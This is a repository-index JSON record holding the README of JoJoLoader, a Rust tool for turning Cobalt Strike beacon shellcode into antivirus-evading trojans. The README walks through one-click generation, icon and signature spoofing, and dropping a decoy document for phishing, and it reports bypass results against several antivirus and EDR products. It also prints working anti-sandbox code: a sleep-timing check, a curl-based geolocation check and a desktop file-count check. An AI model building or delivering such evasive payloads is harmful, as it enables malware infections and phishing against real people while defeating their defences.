{"id":22006207,"url":"https://github.com/pizz33/jojoloader","last_synced_at":"2025-04-04T19:11:48.936Z","repository":{"id":247569071,"uuid":"822780810","full_name":"Pizz33/JoJoLoader","owner":"Pizz33","description":"助力红队成员一键生成免杀木马，使用rust实现 | Help Redteam members generate Evasive Anti-virus software Trojan","archived":false,"fork":false,"pushed_at":"2024-08-07T06:02:48.000Z","size":793,"stargazers_count":542,"open_issues_count":0,"forks_count":79,"subscribers_count":8,"default_branch":"main","last_synced_at":"2025-03-28T18:13:45.563Z","etag":null,"topics":["beacon","bypass-antivirus","bypassedr","cobaltstrike","redteam"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Pizz33.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-07-01T20:07:12.000Z","updated_at":"2025-03-26T16:30:32.000Z","dependencies_parsed_at":"2024-11-05T15:38:08.739Z","dependency_job_id":"0727c06e-d231-47a0-b1cc-f95ea635126b","html_url":"https://github.com/Pizz33/JoJoLoader","commit_stats":null,"previous_names":["pizz33/jojoloader"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Pizz33%2FJoJoLoader/manifests","owner_url":"https://rep
os.ecosyste.ms/api/v1/hosts/GitHub/owners/Pizz33","download_url":"https://codeload.github.com/Pizz33/JoJoLoader/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247234922,"owners_count":20905854,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["beacon","bypass-antivirus","bypassedr","cobaltstrike","redteam"],"created_at":"2024-11-30T01:10:17.742Z","updated_at":"2025-04-04T19:11:48.914Z","avatar_url":"https://github.com/Pizz33.png","language":"Rust","funding_links":[],"categories":[],"sub_categories":[],"readme":"![JoJoLoader](https://github.com/Pizz33/JoJoLoader/assets/88339946/dd259365-7334-43df-aee5-2d53d39c0fa9)\n\n# JoJoLoader\n\nHelps red team members generate AV-evading trojans with one click, implemented in Rust (by_hyyrent)\n\nChangelog\n---\n2024/08/07 Improved evasion: full 360 suite ✔ Huorong ✔ Defender ✔ (latest virus databases)\n\n![image](https://github.com/user-attachments/assets/1708a617-5d70-47d5-8fae-da0b92399f10)\n\nBackground\n---\n\nBecause loaders written in Go have become so common in recent years, AV products have stepped up static detection of Go-compiled binaries, especially the \"numeric\" AV (360).\n\nAfter tuning my earlier Go evasion project 千机 (Qianji) many times the results were still unsatisfying, so I decided to rewrite it in Rust, and this project was born.\n\nUsage\n---\n\nAs with 千机, generation is one-click, and the icon and signature are replaced automatically.\n\nGenerate a `stageless payload`:\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/49ddd939-32c3-495f-8ab7-a6f649a3a138)\n\nPlace `beacon_x64.bin` in the current directory (this is the default export name in CS 4.7 and later, which I use; rename the file yourself for other versions).\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/294efecb-b0bf-45cc-afac-7a107cac3b14)\n\nRun `一键生成.bat` and wait for the trojan to be generated.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/6ad29be8-7a42-4348-8606-113caee887f0)\n\nThe generated trojan is written to the `output` folder under a random six-digit name.\n\nThe file tagged `sign` is the copy whose signature has been replaced automatically; adding an icon and a signature maximizes the chance of bypassing QVM.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/7b30c675-acb4-40ae-9045-1d92afbc97b7)\n\nPhishing scenario: dropping a decoy document\n---\n\nTo fit real phishing scenarios the loader can drop a benign file; the bundled document lives in the `bundle` folder.\n\nBy default it drops a document that appears corrupted when opened; adjust the code to your engagement.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/4ca87739-3dfc-4a07-bda0-0cf5b0c90505)\n\nIf you do not need a bundled file, comment out the corresponding lines.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/7b5b4ed6-5f7f-431c-9502-be82a31dd74b)\n\nProgram icon\n---\n\nFour common icons are provided in the `static` directory; edit the corresponding name in `icon.rc` to select one.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/9480ea64-e78f-4ce3-bda7-a2a6bc451688)\n\nEvasion results\n---\n**360 and Huorong**\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/b6fb7409-4560-493c-bf2e-a3198837ca70)\n\n**360 Antivirus**\n\nWith the antivirus component installed, 360 detects more; QVM is sometimes unpredictable, so if you get a QVM hit try a different icon.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/bfc2da65-49e7-4a97-bb83-9c0420edb034)\n\n**Defender**\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/f6c49329-8cd9-48d7-af33-130fa165c3ee)\n\n**ThreatBook (微步)**\n\nTested at release time; the verdict was clean.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/1ebe6cba-b85e-4964-843a-1f54a279f591)\n\n**Kaspersky, ESET**\n\nNon-Chinese EDR products scan memory, so the beacon `.bin` itself has to be modified; a loader alone is very limited. The tests below use a modified `.bin`.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/f5c66ab3-9034-49af-b01d-a7bc4bf12fc7)\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/5ce2e534-d1cb-4865-898b-6187dbf84d3d)\n\nEnvironment setup\n---\nhttps://www.rust-lang.org/zh-CN/tools/install\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/a1b8b73a-5545-4797-b2d3-b2605640b7a7)\n\nDownload and run the installer for your platform, choose the default option 1, then configure the environment variables.\n\n![image](https://github.com/Pizz33/JoJoLoader/assets/88339946/bb0a690c-1703-4b49-8b43-20b70de024a8)\n\nIf compilation fails after installation, run:\n\n```\nrustup default stable-x86_64-pc-windows-msvc\n```\n\nAnti-sandbox\n---\nMore anti-sandbox checks are not better. Only the three most useful ones are kept: they are compatible with the vast majority of environments and, as far as possible, keep a sandbox's virtual host from checking in after the sample is uploaded.\n\n### Timing check ###\n\n```\npub fn flow_time() {\n    use std::thread::sleep;\n    use std::time::{Duration, Instant};\n\n    // Sleep for five seconds on a monotonic clock. A sandbox that\n    // fast-forwards the sleep returns early, so the measured elapsed\n    // time comes up short of what was requested.\n    let start_time = Instant::now();\n\n    sleep(Duration::from_millis(5000));\n\n    let elapsed_time = start_time.elapsed();\n\n    if elapsed_time.as_millis() \u003c 5000 {\n        std::process::exit(1);\n    }\n}\n```\n\nThis function detects a sandbox that accelerates time by checking whether the sleep really took as long as requested.\n\n### Checking the egress IP ###\n\n```\nuse std::os::windows::process::CommandExt;\nuse std::process::Command;\nuse std::str;\n\n// Win32 CREATE_NO_WINDOW process-creation flag: the cmd.exe child gets no console window.\nconst CREATE_NO_WINDOW: u32 = 0x0800_0000;\n\nfn ip() {\n    // Ask a public geolocation service for the egress address via curl.\n    let output = Command::new(\"cmd\")\n        .args(\u0026[\"/c\", \"curl -s https://myip.ipip.net/\"])\n        .creation_flags(CREATE_NO_WINDOW)\n        .output()\n        .expect(\"Failed to execute command\");\n\n    if !output.status.success() {\n        std::process::exit(1);\n    }\n\n    let body = str::from_utf8(\u0026output.stdout).expect(\"Failed to parse response\");\n\n    // myip.ipip.net answers in Chinese; \"中国\" (China) appears in the\n    // location field for Chinese addresses. Exit if it is absent.\n    if !body.contains(\"中国\") {\n        std::process::exit(1);\n    }\n}\n```\n\nThis function obtains the egress IP with `curl` and exits if it is not in China. Note that it spawns `cmd.exe` and `curl.exe` as child processes and makes an outbound HTTPS request, both of which show up in endpoint telemetry.\n\n### Checking the number of files on the desktop ###\n\n```\nuse std::fs;\nuse std::path::PathBuf;\n\nfn check_desktop() {\n    let desktop_path = get_desktop_path().expect(\"Could not determine the desktop path\");\n\n    let entries = match fs::read_dir(\u0026desktop_path) {\n        Ok(entries) =\u003e entries,\n        Err(_) =\u003e {\n            std::process::exit(1);\n        }\n    };\n\n    // Count readable entries; a freshly provisioned sandbox usually has\n    // only a handful of items on the desktop.\n    let file_count = entries.filter_map(|entry| entry.ok()).count();\n\n    if file_count \u003c 10 {\n        std::process::exit(1);\n    }\n}\n\n// Needs the `dirs` crate for home_dir(). Only the Windows desktop layout\n// is supported; other platforms yield None, which check_desktop treats as a failure.\nfn get_desktop_path() -\u003e Option\u003cPathBuf\u003e {\n    let home_dir = dirs::home_dir()?;\n    if cfg!(target_os = \"windows\") {\n        Some(home_dir.join(\"Desktop\"))\n    } else {\n        None\n    }\n}\n```\nThis function locates the desktop and exits if it holds fewer than 10 entries.\n\nDisclaimer\n---\n- For technical research and formally authorized offensive/defensive engagements only. Users must comply with the Cybersecurity Law of the People's Republic of China and must not use this tool for any illegal activity. If the tool is put to any other use, the user bears full legal and joint liability; the author and publisher accept none.\n\n- Follow the documented steps one by one before use. Look up solutions to errors yourself (Baidu); issues of that kind will not get a reply. Thanks for your understanding.\n\nReference\n---\nThe code borrowed from and learned from the projects below; I pulled an all-nighter the night of the commit and did not get around to writing this, so it is added now. If the evasion stops working, modify the code yourself; I only provide one approach. Have fun ♥\n\nhttps://github.com/joaoviictorti/RustRedOps\n\nhttps://github.com/xiao-zhu-zhu/RustBypassMap\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpizz33%2Fjojoloader","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpizz33%2Fjojoloader","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpizz33%2Fjojoloader/lists"}